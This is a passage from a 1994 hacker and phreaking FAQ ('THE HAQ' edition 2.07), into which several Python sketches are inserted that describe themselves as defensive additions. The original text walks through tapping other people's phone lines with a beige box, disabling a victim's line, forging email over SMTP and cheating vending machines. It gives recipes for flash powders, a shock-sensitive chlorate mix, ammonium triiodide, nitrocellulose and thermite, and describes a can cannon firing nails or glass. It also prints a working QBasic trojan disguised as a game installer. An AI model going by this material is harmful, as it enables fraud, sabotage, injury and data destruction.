fortress phones but others look about the same except for a lack of phone company logo. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. 
OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. Cut the head off one end of the phone cord. 2. Strip the coating back about two (2) inches. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a lamer, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the threaded end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ BEIGE BOXING 101 Field Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and fry a phreak" it doesn't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this file to whoever you want, just make sure it all stays together, same title, same byline. 
Field phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hi-tech revenge, anything you can do from your own phone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your phone cord before the jack, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a phone, laptop, anything you can plug in a jack.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on phone poles, where your phone line meets your house, and near payphones. I'll go into detail below, but basically just open any box on a telephone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a phone jack. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just fuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telephone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one phone line. These are the fist sized gray or black boxes that appear where a single phone line meets the mother line. 
They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their phone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. These are the 3 foot high green/gray metal columns that are no wider than a telephone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of phone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig-zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. 
They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from friends and some social engineering, I learned that inside is where two underground phone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to phone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6 x 4, attached to a telephone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 phones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 phones the box connects too). On houses: follow the phone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. 
Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payphones: follow the phone line up from the phone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little phone jack. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there will be a sw. ap. like those on houses (see above). Payphones are normally pretty secure now though, and you probably won't find any of those. Phreaky things you can do: Jesus, do I have to tell you lamers everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hi-tech revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to elite for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something a lot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telephone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two terminals with a paper clip or an alligator clip! His phone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (his #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, E-mail revolution@delphi.com no PGP needed. 
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to choose the number of ports for your conference call, and how to dial each participant.. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK? (from Token) Just scroll through your favorite business magazine and look for 800#s. Once you get a VMB system you can look for a box being used and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you’re
lucky you might get the root box (I did, the stupid ass’s passwd
was <4321>).

=====================================================================
II. Fake E-mail
(Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING “HELO”.
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a “.” on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin … don’t harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
“Apparently-To:(name)” even if not, most people wouldn’t know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won’t add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.
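
The list above notes that mail injected this way is "traceable by any sysadmin" and may carry an "Apparently-To:" line. The following is an added example, not part of the original FAQ, of how a mail administrator could triage a stored message for those traces. The sample messages, host names and addresses are constructed, and the indicator names and the two-label domain comparison are assumptions of this sketch.

```python
import email
import re
from email.utils import parseaddr

# "from <name given in HELO> (<name the server resolved> [<peer IP>])",
# the layout used by the Received: lines quoted at the top of this page.
RECEIVED_FROM = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:(?P<rdns>[^\s\[\]]+)\s+)?\[(?P<ip>[0-9.]+)\]\)"
)

# Constructed sample: hand-typed SMTP session, sender lied in HELO and From.
FORGED = """\
Received: from admin.cs.example.org (dialup7.example.net [192.0.2.77])
    by mail.example.edu (8.6.4/8.6.4) id WAA01234; Mon, 13 Jun 1994 22:10:05 -0400
Date: Mon, 13 Jun 1994 22:10:05 -0400
From: security@admin.cs.example.org
Message-Id: <199406140210.WAA01234@mail.example.edu>
Apparently-To: bob@example.edu
Subject: account check

Please reply with your details.
"""

# Constructed sample: ordinary mail handed over by the sender's own mail host.
GENUINE = """\
Received: from mail.example.org (relay3.example.org [198.51.100.25])
    by mail.example.edu (8.6.4/8.6.4) id VAA01230; Mon, 13 Jun 1994 21:58:41 -0400
Date: Mon, 13 Jun 1994 21:58:40 -0400
From: alice@example.org
To: bob@example.edu
Subject: lunch

See you at noon.
"""


def site(host):
    """Last two DNS labels, lower-cased (naive: ignores suffixes like co.uk)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def forgery_indicators(raw):
    """Return a list of triage hints for one stored RFC 822 message."""
    msg = email.message_from_string(raw)
    found = []

    # Added by the receiving mailer when the typed message had no To:/Cc:.
    if msg["Apparently-To"] is not None:
        found.append("apparently-to")

    received = msg.get_all("Received") or []
    if not received:
        return found + ["no-received"]

    # Only the topmost Received: line was written by our own server; lines
    # below it arrived with the message and can be typed in by the sender.
    hop = RECEIVED_FROM.search(received[0])
    if hop is None:
        return found + ["unparsed-received"]
    if hop["rdns"] is None:
        return found + ["no-reverse-dns"]

    # The HELO name is whatever the client typed; the name in parentheses is
    # what the server saw for the connecting address.
    if site(hop["helo"]) != site(hop["rdns"]):
        found.append("helo-mismatch")

    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    if from_domain and site(from_domain) != site(hop["rdns"]):
        found.append("origin-mismatch")
    return found


if __name__ == "__main__":
    for label, raw in (("forged", FORGED), ("genuine", GENUINE)):
        print(label, forgery_indicators(raw))
```

Mailing lists and forwarding services also produce an origin mismatch, so these hints rank messages for review rather than prove forgery.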

=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn’t matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only works on some machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards is standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but they are
not mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is a lot of variation in how things are ordered so
occasionally you get ‘Greetings Q. John Smith’ or
‘Greetings John Smith Q.’ rather than ‘Greetings John Q. Smith’.
This track is also used with the new airline auto check in (PSA,
American, etc).

Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a “NATURAL PIN” (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.

Track 3:
The “OFF-LINE” ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.
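
The PIN offset arithmetic described under Track 2, as an added example that is not from the original FAQ or from any issuer's code. HMAC-SHA256 stands in for the issuer's keyed cipher, and the decimalization table, the digit-by-digit reading of "modulo 10 arithmetic", the key and the account number are all assumptions constructed for illustration.

```python
import hashlib
import hmac

# Assumed table mapping each hex digit of the keyed output to a decimal digit.
DECIMALIZE = "0123456789012345"

# Constructed demo values; neither is a real key or a real account number.
DEMO_KEY = b"constructed-demo-key"
DEMO_PAN = "4000001234567899"


def natural_pin(pan, key, length=4):
    """PIN derived from the account number and the issuer's secret key.

    HMAC-SHA256 is a stand-in for the keyed cipher the page mentions.
    """
    mac = hmac.new(key, pan.encode("ascii"), hashlib.sha256).hexdigest()
    return "".join(DECIMALIZE[int(h, 16)] for h in mac[:length])


def digitwise(a, b, sign):
    """Add (sign=+1) or subtract (sign=-1) two digit strings, digit by digit mod 10."""
    return "".join(str((int(x) + sign * int(y)) % 10) for x, y in zip(a, b))


def make_offset(pan, key, chosen_pin):
    """Value stored in the clear on the card when the customer picks a PIN."""
    return digitwise(chosen_pin, natural_pin(pan, key, len(chosen_pin)), -1)


def verify(pan, key, offset, entered_pin):
    """Issuer-side check: natural PIN plus offset must equal the entered PIN."""
    expected = digitwise(natural_pin(pan, key, len(offset)), offset, +1)
    return hmac.compare_digest(expected, entered_pin)


def pins_consistent_with(offset):
    """Every selected PIN that some natural PIN could produce with this offset.

    Without the key the natural PIN is unknown, so each candidate natural PIN
    maps the same offset to a different selected PIN.
    """
    width = len(offset)
    return {digitwise(f"{n:0{width}d}", offset, +1) for n in range(10 ** width)}


if __name__ == "__main__":
    offset = make_offset(DEMO_PAN, DEMO_KEY, "4821")
    print("offset written to card:", offset)
    print("correct PIN accepted:", verify(DEMO_PAN, DEMO_KEY, offset, "4821"))
    print("wrong PIN accepted:", verify(DEMO_PAN, DEMO_KEY, offset, "4822"))
    print("PINs still possible from offset alone:",
          len(pins_consistent_with(offset)))
```

The last function is the point the passage makes: the offset alone leaves all 10,000 four-digit PINs possible, so recovering the PIN requires the secret key.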

=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.

REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder

Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder

*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.

___________________________________
open –> ()____)_____)_____)_____)_____)_____) <--closed (barrel) 1 2 3 4 5 6 (breach) 5. Duct tape all of the cans together. USE LOTS OF TAPE!! 6. Put some gunpowder in the bottom of the CANnon. 7. Aim, brace the CANnon. 8. Spray hairspray or pour alcohol on the tennis ball and light. 9. Drop the ball into the can and STAND BACK! Other ideas: a) Make explosive tennis balls. b) Launch potatoes. c) Launch thumbtacks, nails, broken glass, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)? (from Terrorist's Handbook) Materials: cotton, concentrated nitric acid, concentrated sulfuric acid, distilled water Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue litmus paper Procedure: 1. Pour 10mL of sulfuric acid into beaker. 2. Pour 10mL of nitric acid into beaker with sulfuric acid. 3. Immediately add 0.5 gram of cotton. 4. Allow it to soak for EXACTLY three(3) minutes. 5. Remove the nitrocellulose. 6. Put the nitrocellulose into a beaker of distilled water to wash it in. 7. Allow the material to dry. 8. Re-wash it. 9. Once neutral(acid/base) it can be dried and stored. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THERMITE AND HOW DO I MAKE IT? Thermite is a powder which burns incredibly hot (approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. 
[number not available - 🙁 ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "boot.com" How to use it? This can pose as the installation program for a game. This means that when you upload it to a BBS or something, and post that it is a kickass game, people will download it and try to install it on their computers! What does it do? 
This program changes directory to the root and makes 100000 dirs in
the root. You cannot use deltree to wipe them out in one chunk and
you CANNOT get rid of them without doing reverse engineering on the
program, ie. rd instead of md. To get rid of them any other way you
would have to format c: or d:

**

_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***

+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+

File 2 of 3

=====================================================================
VI. NEWBIES READ THIS
(Basic Hacking)

WHAT MAKES A SYSTEM SECURE?
(from alt.security FAQ)
"The only system which is truly secure is one which is switched off
and unplugged, locked in a titanium lined safe, buried in a concrete
bunker, and is surrounded by nerve gas and very highly paid armed
guards. Even then I wouldn't stake my life on it."
- originally from Gene Spafford

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM?

Password Access- Get rid of simple passwords; routinely change all
passwords; regular review/monitoring of password files

Physical Access- Lock up terminals, personal computers, disks when
not in use; eliminate unnecessary access lines; disconnect modems
when not in use

Other measures- Know who you are talking to; shred all documents;
avoid public domain software; report suspicious activity (especially
non-working hours access)

What this all means is that hackers must now rely on the ineptitude
and laziness of the users of the system rather than the ignorance of
SysOps. The SysOps and SecMans (Security Managers) are getting
smarter and keeping up to date. Not only that, but they are
monitoring the hack/phreak BBSes and publications. So the bottom
line is reveal nothing to overinquisitive newbies...they may be
working for the wrong side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A FIREWALL?
(from the comp.security.misc FAQ)
A (Internet) firewall is a machine which is attached (usually)
between your site and a Wide Area Network (WAN). It provides
controllable filtering of network traffic, allowing restricted access
to certain Internet port numbers and blocks access to pretty well
everything else.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS?
1. Don't do damage intentionally.
2. Don't alter files other than to hide your presence or to remove
traces of your intrusion.
3. Don't leave any real name, handle, or phone number on any system.
4. Be careful who you share info with.
5. Don't leave your phone number with anyone you don't know.
6. Do NOT hack government computers.
7. Don't use codes unless you HAVE to.
8. Be paranoid!
9. Watch what you post on boards, be as general as possible.
10. Ask questions...but do it politely and don't expect to have
everything handed to you.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO I DO IF I AM GETTING NOWHERE?
1. Change parity, data length, and stop bits. The system may not
respond to 8N1 (most common setting) but may respond to 7E1, 8E2,
7S2, etc.
2. Change baud rates.
3. Send a series of carriage returns.
4. Send a hard break followed by a carriage return.
5. Send control characters. Work from ^a to ^z.
6. Change terminal emulation.
7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
LOGON, JOIN, HELP, or anything else you can think of.

=====================================================================
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)

WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin. These accounts may be unpassworded or
the password may possibly be the same (i.e. username uucp has uucp as
the passwd).

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:

userid:password:userid#:groupid#:GECOS field:home dir:shell

What each of these fields mean/do---

userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.

password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run through the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.

userid# -=> a unique number assigned to each user, used for
permissions

groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group

GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.

home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)

shell -=> this is the name of the shell which is
automatically started for the login

Note that all the fields are separated by colons in the passwd file.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discreetly!
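
Added example (not part of the original FAQ): a defender-side audit of passwd-format text, using the seven colon-separated fields and the password-field symbols described in the two entries above. The sample entries, the function names and the extra uid 0 check are constructed for illustration.

```python
import re

# Constructed sample in the seven-field passwd format; not taken from a real host.
SAMPLE_PASSWD = """\
root:x:0:0:Super User:/root:/bin/sh
daemon:*:1:1:daemon:/:/sbin/nologin
guest::500:500:Guest Account,,,:/home/guest:/bin/sh
uucp:Ab3dEfGhIjKlM:10:14:uucp:/var/spool/uucp:/bin/sh
toor:x:0:0:Backup root:/root:/bin/sh
broken:x:1001
"""

FIELDS = ("userid", "password", "uid", "gid", "gecos", "home", "shell")
# Traditional DES crypt output: 2 salt characters + 11 hash characters.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")


def classify_password(field):
    """Classify the second passwd field without trying to recover anything."""
    if field == "":
        return "empty"
    if field == "x" or field.startswith(("*", "!")):
        return "shadowed-or-locked"
    if DES_CRYPT.match(field):
        return "des-crypt-hash"
    return "other"


def parse_passwd(text):
    """Return [(lineno, record or None)]; None marks a line without 7 fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        record = dict(zip(FIELDS, parts)) if len(parts) == 7 else None
        entries.append((lineno, record))
    return entries


def audit(text):
    """Return sorted findings as (lineno, userid, message)."""
    findings = []
    for lineno, rec in parse_passwd(text):
        if rec is None:
            findings.append((lineno, "?", "malformed line, expected 7 fields"))
            continue
        user = rec["userid"]
        kind = classify_password(rec["password"])
        if kind == "empty":
            findings.append((lineno, user, "empty password field"))
        elif kind == "des-crypt-hash":
            findings.append((lineno, user, "hash readable in passwd, not shadowed"))
        if not rec["uid"].isdigit():
            findings.append((lineno, user, "non-numeric userid#"))
        elif int(rec["uid"]) == 0 and user != "root":
            # Assumption of this example: only root should hold uid 0.
            findings.append((lineno, user, "uid 0 account other than root"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, user, message in audit(SAMPLE_PASSWD):
        print(f"line {lineno}: {user}: {message}")
```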

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
